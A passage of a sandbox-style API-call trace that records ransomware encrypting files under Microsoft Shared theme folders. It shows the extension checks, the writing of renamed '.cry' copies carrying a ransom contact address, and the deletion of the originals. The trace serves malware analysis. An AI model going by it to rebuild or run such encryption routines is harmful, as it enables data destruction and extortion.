lpNumberOfBytesWritten=0x225fc9c*=0x3d80, lpOverlapped=0x0) returned 1 [0047.091] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.091] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.091] SetEndOfFile (hFile=0x1ac) returned 1 [0047.091] CloseHandle (hObject=0x1ac) returned 1 [0047.092] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.092] SetEndOfFile (hFile=0x190) returned 1 [0047.093] CloseHandle (hObject=0x190) returned 1 [0047.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.093] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 1 [0047.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.093] lstrlenW (lpString=".doc") returned 4 [0047.093] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.093] lstrlenW (lpString=".docx") returned 5 [0047.093] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.093] lstrlenW (lpString=".pdf") returned 4 [0047.093] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.093] lstrlenW (lpString=".xls") returned 4 [0047.093] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.093] lstrlenW (lpString=".xlsx") returned 5 [0047.093] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.093] lstrlenW (lpString=".ppt") returned 4 [0047.093] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.093] lstrlenW (lpString=".zip") returned 4 [0047.093] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.093] lstrlenW (lpString=".rar") returned 4 [0047.093] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.093] lstrlenW (lpString=".bz2") returned 4 [0047.093] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.093] lstrlenW (lpString=".7z") returned 3 [0047.094] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.094] lstrlenW (lpString=".dbf") returned 4 [0047.094] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.094] lstrlenW (lpString=".1cd") returned 4 [0047.094] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.094] lstrlenW (lpString=".jpg") returned 4 [0047.094] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.094] lstrlenW (lpString=".doc") returned 4 [0047.094] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.094] lstrlenW (lpString=".docx") returned 5 [0047.094] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.094] lstrlenW (lpString=".pdf") returned 4 [0047.094] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.094] lstrlenW (lpString=".xls") returned 4 [0047.094] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.094] lstrlenW (lpString=".xlsx") returned 5 [0047.094] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.094] lstrlenW (lpString=".ppt") returned 4 [0047.094] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.094] lstrlenW (lpString=".zip") returned 4 [0047.094] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.094] lstrlenW (lpString=".rar") returned 4 [0047.094] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.094] lstrlenW (lpString=".bz2") returned 4 [0047.094] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.094] lstrlenW (lpString=".7z") returned 3 [0047.094] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.094] lstrlenW (lpString=".dbf") returned 4 [0047.094] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.094] lstrlenW (lpString=".1cd") returned 4 [0047.094] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.095] lstrlenW (lpString=".jpg") returned 4 [0047.095] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.095] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0047.095] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.095] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.095] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=53115) returned 1 [0047.095] CloseHandle (hObject=0x190) returned 1 [0047.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 0x20 [0047.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.095] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.095] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.095] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.095] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0047.096] GetLastError () returned 0x0 [0047.096] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xcf7b, lpOverlapped=0x0) returned 1 [0047.200] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xcf80, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xcf80, lpOverlapped=0x0) returned 1 [0047.204] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.204] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.204] SetEndOfFile (hFile=0x1ac) returned 1 [0047.204] CloseHandle (hObject=0x1ac) returned 1 [0047.204] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.204] SetEndOfFile (hFile=0x190) returned 1 [0047.205] CloseHandle (hObject=0x190) returned 1 [0047.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.205] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 1 [0047.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.205] lstrlenW (lpString=".doc") returned 4 [0047.205] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.205] lstrlenW (lpString=".docx") returned 5 [0047.205] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.206] lstrlenW (lpString=".pdf") returned 4 [0047.206] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.206] lstrlenW (lpString=".xls") returned 4 [0047.206] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.206] lstrlenW (lpString=".xlsx") returned 5 [0047.206] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.206] lstrlenW (lpString=".ppt") returned 4 [0047.206] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.206] lstrlenW (lpString=".zip") returned 4 [0047.206] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.206] lstrlenW (lpString=".rar") returned 4 [0047.206] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.206] lstrlenW (lpString=".bz2") returned 4 [0047.206] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.206] lstrlenW (lpString=".7z") returned 3 [0047.206] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.206] lstrlenW (lpString=".dbf") returned 4 [0047.206] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.206] lstrlenW (lpString=".1cd") returned 4 [0047.206] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.206] lstrlenW (lpString=".jpg") returned 4 [0047.206] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.206] lstrlenW (lpString=".doc") returned 4 [0047.206] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.206] lstrlenW (lpString=".docx") returned 5 [0047.206] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.206] lstrlenW (lpString=".pdf") returned 4 [0047.206] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.206] lstrlenW (lpString=".xls") returned 4 [0047.206] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.206] lstrlenW (lpString=".xlsx") returned 5 [0047.206] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.206] lstrlenW (lpString=".ppt") returned 4 [0047.206] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.207] lstrlenW (lpString=".zip") returned 4 [0047.207] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.207] lstrlenW (lpString=".rar") returned 4 [0047.207] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.207] lstrlenW (lpString=".bz2") returned 4 [0047.207] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.207] lstrlenW (lpString=".7z") returned 3 [0047.207] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.207] lstrlenW (lpString=".dbf") returned 4 [0047.207] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.207] lstrlenW (lpString=".1cd") returned 4 [0047.207] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0047.207] lstrlenW (lpString=".jpg") returned 4 [0047.207] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.207] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0047.207] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.207] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.260] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=31975) returned 1 [0047.260] CloseHandle (hObject=0x208) returned 1 [0047.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 0x20 [0047.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.260] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.260] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.261] GetLastError () returned 0x0 [0047.261] ReadFile (in: hFile=0x208, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x7ce7, lpOverlapped=0x0) returned 1 [0047.324] WriteFile (in: hFile=0x200, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x7cf0, lpOverlapped=0x0) returned 1 [0047.325] ReadFile (in: hFile=0x208, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.325] WriteFile (in: hFile=0x200, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.325] SetEndOfFile (hFile=0x200) returned 1 [0047.325] CloseHandle (hObject=0x200) returned 1 [0047.325] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.325] SetEndOfFile (hFile=0x208) returned 1 [0047.326] CloseHandle (hObject=0x208) returned 1 [0047.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.326] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 1 [0047.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.327] lstrlenW (lpString=".doc") returned 4 [0047.327] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.327] lstrlenW (lpString=".docx") returned 5 [0047.327] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.327] lstrlenW (lpString=".pdf") returned 4 [0047.327] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.327] lstrlenW (lpString=".xls") returned 4 [0047.327] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.327] lstrlenW (lpString=".xlsx") returned 5 [0047.327] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.327] lstrlenW (lpString=".ppt") returned 4 [0047.327] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.327] lstrlenW (lpString=".zip") returned 4 [0047.327] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.327] lstrlenW (lpString=".rar") returned 4 [0047.327] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.327] lstrlenW (lpString=".bz2") returned 4 [0047.327] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.327] lstrlenW (lpString=".7z") returned 3 [0047.327] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.328] lstrlenW (lpString=".dbf") returned 4 [0047.328] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.328] lstrlenW (lpString=".1cd") returned 4 [0047.328] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.328] lstrlenW (lpString=".jpg") returned 4 [0047.328] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.328] lstrlenW (lpString=".doc") returned 4 [0047.328] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.328] lstrlenW (lpString=".docx") returned 5 [0047.328] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.328] lstrlenW (lpString=".pdf") returned 4 [0047.328] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.328] lstrlenW (lpString=".xls") returned 4 [0047.328] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.328] lstrlenW (lpString=".xlsx") returned 5 [0047.328] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.328] lstrlenW (lpString=".ppt") returned 4 [0047.328] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.328] lstrlenW (lpString=".zip") returned 4 [0047.328] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.328] lstrlenW (lpString=".rar") returned 4 [0047.328] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.328] lstrlenW (lpString=".bz2") returned 4 [0047.329] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.332] lstrlenW (lpString=".7z") returned 3 [0047.332] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.332] lstrlenW (lpString=".dbf") returned 4 [0047.332] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.333] lstrlenW (lpString=".1cd") returned 4 [0047.333] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0047.333] lstrlenW (lpString=".jpg") returned 4 [0047.333] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.333] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.333] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.337] GetLastError () returned 0x0 [0047.337] ReadFile (in: hFile=0x208, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xe1b, lpOverlapped=0x0) returned 1 [0047.431] WriteFile (in: hFile=0x200, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe20, lpOverlapped=0x0) returned 1 [0047.826] ReadFile (in: hFile=0x208, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.826] WriteFile (in: hFile=0x200, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.826] SetEndOfFile (hFile=0x200) returned 1 [0047.826] CloseHandle (hObject=0x200) returned 1 [0047.827] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.827] SetEndOfFile (hFile=0x208) returned 1 [0047.827] CloseHandle (hObject=0x208) returned 1 [0047.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.828] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 1 [0047.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.828] lstrlenW 